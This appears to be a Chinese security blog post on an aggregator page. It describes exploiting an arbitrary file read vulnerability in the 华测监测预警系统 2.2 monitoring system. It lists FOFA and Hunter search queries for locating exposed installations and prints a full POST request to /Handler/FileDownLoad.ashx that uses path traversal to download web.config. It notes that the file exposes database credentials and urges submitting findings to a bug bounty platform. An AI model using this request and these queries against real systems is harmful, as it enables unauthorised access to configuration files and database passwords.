当前位置: 首页 > news >正文

华测监测预警系统 2.2---任意文件读取漏洞

目录

1. 资产搜集

2. 漏洞复现

3. 实战总结


1. 资产搜集

直接上fofa 和 hunter
个人推荐hunter可以看到icp备案公司直接提交盒子就行了

FOFA语法 app=”华测监测预警系统2.2”

Hunter语法 web.body=”华测监测预警系统2.2”

图片

2. 漏洞复现

这里手动复现的,目录是/Handler/FileDownLoad.ashx
通过hackerbar 可以修改POST传参,或者利用BP构造请求包。

 
  1. POST /Handler/FileDownLoad.ashx HTTP/1.1

  2. Host: ip:port

  3. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)

  4. Accept-Encoding: gzip, deflate

  5. Accept: */*

  6. Connection: close

  7. Content-Type: application/x-www-form-urlencoded

  8. Content-Length: 36

  9. filename=1&filepath=../../web.config

这里的filename随便传参,只是一个文件名字。
filepath是文件路径,这里访问后会直接下载文件到本地。

图片

文件里包含了数据库的账号密码

3. 实战总结

最后直接用hunter找到有备案信息的公司,直接提交 盒子成功!!!

图片

图片

                                                            没看够~?欢迎关注扫一扫!

http://www.lryc.cn/news/198410.html

相关文章:

  • 新版多功能去水印工具微信小程序源码下载+带流量主功能
  • 文章必备| 叶绿体基因组高级分析内容汇总
  • 阿里实习JAVA后端面经总结
  • 利用 NLP 超能力:一步步介绍Hugging Face微调教程
  • 凝聚技术力量 共建测试生态 ——集成电路测试技术交流日成功举办
  • 机器学习-ROC曲线:技术解析与实战应用
  • macos平台好用的FTP客户端 Transmit 5最新中文
  • 用JavaScript输出0-9的两种方法、以及setTimeout的三个参数的意义
  • 酷鸟云近期主要新功能合集
  • 【大数据开发技术】实验06-SequenceFile、元数据操作与MapReduce单词计数
  • 【C语言】输入一个正整数,判断其是否为素数
  • 2023年Q3季度国内手机大盘销额下滑2%,TOP品牌销售数据分析
  • 使用按钮从 SAP 系统内打开 Excel 文件
  • 人工智能(pytorch)搭建模型20-基于pytorch搭建文本生成视频的生成对抗网络,技术创新点介绍
  • C/C++面试常见问题——指针和引用的区别
  • 探索DeFi世界,MixGPT引领智能金融新时代
  • 留学教育咨询机构如何通过软文强势突围
  • 苹果平板可以用别的电容笔吗?电容笔和Apple pencil区别
  • 【Matlab笔记_16】yyyy-MM-dd HH:mm:ss的datetime格式拆分为yyyy-MM-dd日期部分和HH:mm:ss时间部分
  • Android12之DRM架构(一)
  • 檀香香料经营商城小程序的作用是什么
  • RPA在票据处理中的应用
  • Jmeter接口测试 —— jmeter对图片验证码的处理
  • minikube创建一个pod并暴露端口(使用docker驱动安装)
  • 2023国考证件照要求什么底色?证件照换背景底色的方法
  • 【SA8295P 源码分析 (一)】87 - SA8295P HQNX + Android 编译环境搭建指导
  • 网络基本结构及数据传输方式
  • 从实体经济和数字经济融合展开,思考商业模式的变化
  • Python 框架学习 Django篇 (四) 数据库增删改查(CURD)
  • 关于错误码